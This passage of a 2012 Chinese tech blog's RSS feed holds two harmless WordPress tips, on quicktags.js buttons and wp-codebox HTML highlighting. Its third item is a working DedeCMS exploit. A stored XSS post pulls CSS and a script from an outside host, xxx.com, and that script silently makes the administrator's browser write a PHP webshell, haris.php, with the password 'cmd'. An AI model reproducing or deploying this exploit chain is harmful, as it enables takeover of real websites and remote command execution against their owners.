    j.&lt;span style=&quot;color: #660066;&quot;&gt;Buttons&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;j.&lt;span style=&quot;color: #660066;&quot;&gt;Buttons&lt;/span&gt;.&lt;span style=&quot;color: #660066;&quot;&gt;length&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;
    &lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;new&lt;/span&gt; edButton&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;ed_pre_js&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;pre_js&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;&amp;lt;xpre lang='JavaScript' line='1' file='code.txt' colla='+'&amp;gt;n&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;n&amp;lt;/xpre&amp;gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;ppp&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt;&lt;span style=&quot;color: #CC0000;&quot;&gt;1&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;修改好了，看下后台编辑吧！&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;好了，看下后台吧：&lt;/strong&gt;&lt;img class=&quot;aligncenter size-full wp-image-4042&quot; title=&quot;wp-codebox&quot; src=&quot;http://www.uedbox.com/wp-content/uploads/2012/02/wp-codebox.jpg&quot; alt=&quot;&quot; width=&quot;447&quot; height=&quot;98&quot; /&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/607593905/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_14/4040/wp-codebox-add-button.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><wfw:commentRss>http://www.uedbox.com/2012_02_14/4040/wp-codebox-add-button.jsp/feed</wfw:commentRss><slash:comments>1</slash:comments><description>修改步骤： １、在插入代码前，将wordpress 编辑器切换为“HTML编辑”模式； ２、因为在 Pre 标签里再贴 Pre 标签就会出问题，所以请将本站实例代码中的 xpre 替换为 pre； ３、 Lang=”&quot; 这里可以修改为你喜欢的语言，当然先留空到时候再填也可以； ４、修改 wp-includes/js/quicktags.js 这个文件; 先找到这句代码 1 edButtons&amp;#91;edButtons.length&amp;#93;=new edButton&amp;#40;&amp;#34;ed_code&amp;#34;,&amp;#34;code&amp;#34;,&amp;#34;&amp;#60;code&amp;#62;&amp;#34;,&amp;#34;&amp;#60;/code&amp;#62;&amp;#34;,&amp;#34;c&amp;#34;&amp;#41;; 然后再上面代码后面添加下面代码 1 2 3 4 5 6 edButtons&amp;#91;edButtons.length&amp;#93;= new edButton&amp;#40;&amp;#34;ed_pre_php&amp;#34;,&amp;#34;pre_php&amp;#34;,&amp;#34;n&amp;#34;,&amp;#34;n&amp;#34;,&amp;#34;p&amp;#34;,-1&amp;#41;; edButtons&amp;#91;edButtons.length&amp;#93;= new edButton&amp;#40;&amp;#34;ed_pre_css&amp;#34;,&amp;#34;pre_css&amp;#34;,&amp;#34;n&amp;#34;,&amp;#34;n&amp;#34;,&amp;#34;pp&amp;#34;,-1&amp;#41;; edButtons&amp;#91;edButtons.length&amp;#93;= new edButton&amp;#40;&amp;#34;ed_pre_js&amp;#34;,&amp;#34;pre_js&amp;#34;,&amp;#34;n&amp;#34;,&amp;#34;n&amp;#34;,&amp;#34;ppp&amp;#34;,-1&amp;#41;; 再找到这句代码 1 j.Buttons&amp;#91;j.Buttons.length&amp;#93;=new edButton&amp;#40;a+&amp;#34;_code&amp;#34;,&amp;#34;code&amp;#34;,&amp;#34;&amp;#60;code&amp;#62;&amp;#34;,&amp;#34;&amp;#60;/code&amp;#62;&amp;#34;,&amp;#34;c&amp;#34;&amp;#41;; 再在上面代码下面添加以下代码 1 2 3 4 5 6 &amp;#91;j.Buttons.length&amp;#93; = new edButton&amp;#40;&amp;#34;ed_pre_php&amp;#34;, &amp;#34;pre_php&amp;#34;, &amp;#34;&amp;#60;xpre lang='php' [...]&lt;img src=&quot;http://www1.feedsky.com/t1/607593905/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_14/4040/wp-codebox-add-button.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>wp-codebox</category><category>WordPress</category><pubDate>Tue, 14 Feb 2012 23:39:28 +0800</pubDate><author>Adoing</author><comments>http://www.uedbox.com/2012_02_14/4040/wp-codebox-add-button.jsp#comments</comments><guid isPermaLink="false">http://www.uedbox.com/?p=4040</guid><dc:creator>Adoing</dc:creator><fs:srclink>http://www.uedbox.com/2012_02_14/4040/wp-codebox-add-button.jsp</fs:srclink><fs:srcfeed>http://www.uedbox.com/feed</fs:srcfeed><fs:itemid>feedsky/uedbox/~8266863/607593905/6370047</fs:itemid></item><item><title>wp-codebox解决html代码高亮</title><link>http://www.uedbox.com/2012_02_14/4034/wp-codebox-solve-html-highlight.jsp</link><content:encoded>&lt;p&gt;使用wp-codebox遇到个问题就是直接打lang=”html”，html根本没有带上高亮的效果。&lt;br /&gt;
网上GOOGLE下，原来wp-codebox高亮是使用的是GeSHi – Generic Syntax Highlighter（&lt;a href=&quot;http://qbnz.com/highlighter/&quot; title=&quot;wp-codebox的html代码高亮&quot; target=&quot;_blank&quot;&gt;http://qbnz.com/highlighter/&lt;/a&gt;）&lt;br /&gt;
GeSHi对html的解释是html4strict&lt;br /&gt;
因此我们只需要把 lang=”html” -&gt; lang=”html4strict” 就即可高亮。&lt;/p&gt;
&lt;blockquote&gt;&lt;p&gt;注：此文章为个人记录贴，遇到这问题几次了每次都要重查，索性直接贴上来了，以后忘记了直接站内搜索！&lt;/p&gt;&lt;/blockquote&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/607593906/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_14/4034/wp-codebox-solve-html-highlight.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><wfw:commentRss>http://www.uedbox.com/2012_02_14/4034/wp-codebox-solve-html-highlight.jsp/feed</wfw:commentRss><slash:comments>0</slash:comments><description>使用wp-codebox遇到个问题就是直接打lang=”html”，html根本没有带上高亮的效果。 网上GOOGLE下，原来wp-codebox高亮是使用的是GeSHi – Generic Syntax Highlighter（http://qbnz.com/highlighter/） GeSHi对html的解释是html4strict 因此我们只需要把 lang=”html” -&gt; lang=”html4strict” 就即可高亮。 注：此文章为个人记录贴，遇到这问题几次了每次都要重查，索性直接贴上来了，以后忘记了直接站内搜索！&lt;img src=&quot;http://www1.feedsky.com/t1/607593906/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_14/4034/wp-codebox-solve-html-highlight.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>wp-codebox</category><category>WordPress</category><pubDate>Tue, 14 Feb 2012 23:09:54 +0800</pubDate><author>Adoing</author><comments>http://www.uedbox.com/2012_02_14/4034/wp-codebox-solve-html-highlight.jsp#comments</comments><guid isPermaLink="false">http://www.uedbox.com/?p=4034</guid><dc:creator>Adoing</dc:creator><fs:srclink>http://www.uedbox.com/2012_02_14/4034/wp-codebox-solve-html-highlight.jsp</fs:srclink><fs:srcfeed>http://www.uedbox.com/feed</fs:srcfeed><fs:itemid>feedsky/uedbox/~8266863/607593906/6370047</fs:itemid></item><item><title>DEDECMS XSS GETSHeLL 通杀所有版本</title><link>http://www.uedbox.com/2012_02_14/4028/dedecms-xss-getshell-pass-to-kill.jsp</link><content:encoded>&lt;p&gt;利用条件：开启注册&amp;amp;&amp;amp;开启投稿&lt;br /&gt;
方法 ：注册会员 -&amp;gt; 发表文章：内容输入&lt;/p&gt;

&lt;div class=&quot;wp_codebox&quot;&gt;&lt;table&gt;&lt;tr id=&quot;p402814&quot;&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot; id=&quot;p4028code14&quot;&gt;&lt;pre class=&quot;html4strict&quot; style=&quot;font-family:monospace;&quot;&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;lt;&lt;span style=&quot;color: #000000; font-weight: bold;&quot;&gt;style&lt;/span&gt;&amp;gt;&lt;/span&gt;@import´http://xxx.com/xss.css´;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;lt;&lt;span style=&quot;color: #66cc66;&quot;&gt;/&lt;/span&gt;&lt;span style=&quot;color: #000000; font-weight: bold;&quot;&gt;style&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;xss.css内容：&lt;/p&gt;

&lt;div class=&quot;wp_codebox&quot;&gt;&lt;table&gt;&lt;tr id=&quot;p402815&quot;&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot; id=&quot;p4028code15&quot;&gt;&lt;pre class=&quot;css&quot; style=&quot;font-family:monospace;&quot;&gt;body&lt;span style=&quot;color: #00AA00;&quot;&gt;&amp;#123;&lt;/span&gt;&lt;span style=&quot;color: #000000; font-weight: bold;&quot;&gt;background-image&lt;/span&gt;&lt;span style=&quot;color: #00AA00;&quot;&gt;:&lt;/span&gt;&lt;span style=&quot;color: #993333;&quot;&gt;url&lt;/span&gt;&lt;span style=&quot;color: #00AA00;&quot;&gt;&amp;#40;&lt;/span&gt;´javascript&lt;span style=&quot;color: #3333ff;&quot;&gt;:document&lt;/span&gt;.write&lt;span style=&quot;color: #00AA00;&quot;&gt;&amp;#40;&lt;/span&gt;“&amp;lt;script src&lt;span style=&quot;color: #00AA00;&quot;&gt;=&lt;/span&gt;http&lt;span style=&quot;color: #00AA00;&quot;&gt;:&lt;/span&gt;//xxx.com/logo.jpg&lt;span style=&quot;color: #00AA00;&quot;&gt;&amp;gt;&lt;/span&gt;&amp;lt;/script&lt;span style=&quot;color: #00AA00;&quot;&gt;&amp;gt;&lt;/span&gt;”&lt;span style=&quot;color: #00AA00;&quot;&gt;&amp;#41;&lt;/span&gt;´&lt;span style=&quot;color: #00AA00;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #00AA00;&quot;&gt;&amp;#125;&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;span id=&quot;more-4028&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;logo.jpg内容：&lt;/p&gt;

&lt;div class=&quot;wp_codebox&quot;&gt;&lt;table&gt;&lt;tr id=&quot;p402816&quot;&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot; id=&quot;p4028code16&quot;&gt;&lt;pre class=&quot;javascript&quot; style=&quot;font-family:monospace;&quot;&gt;&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;var&lt;/span&gt; request &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;false&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #000066; font-weight: bold;&quot;&gt;if&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;window.&lt;span style=&quot;color: #660066;&quot;&gt;XMLHttpRequest&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
request &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;new&lt;/span&gt; XMLHttpRequest&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #000066; font-weight: bold;&quot;&gt;if&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;request.&lt;span style=&quot;color: #660066;&quot;&gt;overrideMimeType&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
request.&lt;span style=&quot;color: #660066;&quot;&gt;overrideMimeType&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;´text&lt;span style=&quot;color: #339933;&quot;&gt;/&lt;/span&gt;xml´&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt; &lt;span style=&quot;color: #000066; font-weight: bold;&quot;&gt;else&lt;/span&gt; &lt;span style=&quot;color: #000066; font-weight: bold;&quot;&gt;if&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;window.&lt;span style=&quot;color: #660066;&quot;&gt;ActiveXObject&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;var&lt;/span&gt; versions &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;´Microsoft.&lt;span style=&quot;color: #660066;&quot;&gt;XMLHTTP&lt;/span&gt;´&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; ´MSXML.&lt;span style=&quot;color: #660066;&quot;&gt;XMLHTTP&lt;/span&gt;´&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; ´Microsoft.&lt;span style=&quot;color: #660066;&quot;&gt;XMLHTTP&lt;/span&gt;´&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; ´Msxml2.&lt;span style=&quot;color: #660066;&quot;&gt;XMLHTTP&lt;/span&gt;.7.0´&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;´Msxml2.&lt;span style=&quot;color: #660066;&quot;&gt;XMLHTTP&lt;/span&gt;.6.0´&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;´Msxml2.&lt;span style=&quot;color: #660066;&quot;&gt;XMLHTTP&lt;/span&gt;.5.0´&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; ´Msxml2.&lt;span style=&quot;color: #660066;&quot;&gt;XMLHTTP&lt;/span&gt;.4.0´&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; ´MSXML2.&lt;span style=&quot;color: #660066;&quot;&gt;XMLHTTP&lt;/span&gt;.3.0´&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; ´MSXML2.&lt;span style=&quot;color: #660066;&quot;&gt;XMLHTTP&lt;/span&gt;´&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #000066; font-weight: bold;&quot;&gt;for&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;var&lt;/span&gt; i&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #CC0000;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt; i&lt;span style=&quot;color: #339933;&quot;&gt;&amp;lt;&lt;/span&gt;versions.&lt;span style=&quot;color: #660066;&quot;&gt;length&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt; i&lt;span style=&quot;color: #339933;&quot;&gt;++&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
&lt;span style=&quot;color: #000066; font-weight: bold;&quot;&gt;try&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
request &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;new&lt;/span&gt; ActiveXObject&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;versions&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;i&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt; &lt;span style=&quot;color: #000066; font-weight: bold;&quot;&gt;catch&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;e&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
xmlhttp&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;request&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;function&lt;/span&gt; getFolder&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt; url &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
obj &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; url.&lt;span style=&quot;color: #660066;&quot;&gt;split&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;´&lt;span style=&quot;color: #339933;&quot;&gt;/&lt;/span&gt;´&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;
&lt;span style=&quot;color: #000066; font-weight: bold;&quot;&gt;return&lt;/span&gt; obj&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;obj.&lt;span style=&quot;color: #660066;&quot;&gt;length&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt;&lt;span style=&quot;color: #CC0000;&quot;&gt;2&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
oUrl &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; top.&lt;span style=&quot;color: #660066;&quot;&gt;location&lt;/span&gt;.&lt;span style=&quot;color: #660066;&quot;&gt;href&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
u &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; getFolder&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;oUrl&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
add_admin&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;function&lt;/span&gt; add_admin&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;var&lt;/span&gt; url&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; “&lt;span style=&quot;color: #339933;&quot;&gt;/&lt;/span&gt;”&lt;span style=&quot;color: #339933;&quot;&gt;+&lt;/span&gt;u&lt;span style=&quot;color: #339933;&quot;&gt;+&lt;/span&gt;”&lt;span style=&quot;color: #339933;&quot;&gt;/&lt;/span&gt;sys_sql_query.&lt;span style=&quot;color: #660066;&quot;&gt;php&lt;/span&gt;”&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;var&lt;/span&gt; params &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;”fmdo&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;edit&lt;span style=&quot;color: #339933;&quot;&gt;&amp;amp;&lt;/span&gt;backurl&lt;span style=&quot;color: #339933;&quot;&gt;=&amp;amp;&lt;/span&gt;activepath&lt;span style=&quot;color: #339933;&quot;&gt;=%&lt;/span&gt;2Fdata&lt;span style=&quot;color: #339933;&quot;&gt;&amp;amp;&lt;/span&gt;filename&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;haris.&lt;span style=&quot;color: #660066;&quot;&gt;php&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;&amp;amp;&lt;/span&gt;str&lt;span style=&quot;color: #339933;&quot;&gt;=%&lt;/span&gt;3C&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;3Fphp&lt;span style=&quot;color: #339933;&quot;&gt;+&lt;/span&gt;eval&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;28&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;24_POST&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;5Bcmd&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;5D&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;29&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;3F&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;3E&lt;span style=&quot;color: #339933;&quot;&gt;&amp;amp;&lt;/span&gt;B1&lt;span style=&quot;color: #339933;&quot;&gt;=++%&lt;/span&gt;E4&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;BF&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;9D&lt;span style=&quot;color: #339933;&quot;&gt;+%&lt;/span&gt;E5&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;AD&lt;span style=&quot;color: #339933;&quot;&gt;%&lt;/span&gt;98&lt;span style=&quot;color: #339933;&quot;&gt;++&lt;/span&gt;”&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
xmlhttp.&lt;span style=&quot;color: #000066;&quot;&gt;open&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;“POST”&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; url&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;true&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
xmlhttp.&lt;span style=&quot;color: #660066;&quot;&gt;setRequestHeader&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;“Content&lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt;type”&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; “application&lt;span style=&quot;color: #339933;&quot;&gt;/&lt;/span&gt;x&lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt;www&lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt;form&lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt;urlencoded”&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
xmlhttp.&lt;span style=&quot;color: #660066;&quot;&gt;setRequestHeader&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;“Content&lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt;length”&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; params.&lt;span style=&quot;color: #660066;&quot;&gt;length&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
xmlhttp.&lt;span style=&quot;color: #660066;&quot;&gt;setRequestHeader&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;“Connection”&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; “Keep&lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt;Alive”&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
xmlhttp.&lt;span style=&quot;color: #660066;&quot;&gt;send&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;params&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;管理员后台访问或者审核或者保持登陆状态进行前台访问，会在data目录下生成一句话木马haris.php，密码cmd&lt;br /&gt;
记住这个js脚本吧，get post cookies都可以用这种模式。&lt;br /&gt;
这个ajax写得很完善.(新浪蠕虫依赖jquery直接使用ajax).&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/607593907/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_14/4028/dedecms-xss-getshell-pass-to-kill.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><wfw:commentRss>http://www.uedbox.com/2012_02_14/4028/dedecms-xss-getshell-pass-to-kill.jsp/feed</wfw:commentRss><slash:comments>1</slash:comments><description>利用条件：开启注册&amp;#38;&amp;#38;开启投稿 方法 ：注册会员 -&amp;#62; 发表文章：内容输入 1 &amp;#60;style&amp;#62;@import´http://xxx.com/xss.css´;&amp;#60;/style&amp;#62; xss.css内容： 1 body&amp;#123;background-image:url&amp;#40;´javascript:document.write&amp;#40;“&amp;#60;script src=http://xxx.com/logo.jpg&amp;#62;&amp;#60;/script&amp;#62;”&amp;#41;´&amp;#41;&amp;#125; logo.jpg内容： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 var request = false; if&amp;#40;window.XMLHttpRequest&amp;#41; &amp;#123; request = new XMLHttpRequest&amp;#40;&amp;#41;; if&amp;#40;request.overrideMimeType&amp;#41; &amp;#123; [...]&lt;img src=&quot;http://www1.feedsky.com/t1/607593907/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_14/4028/dedecms-xss-getshell-pass-to-kill.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; 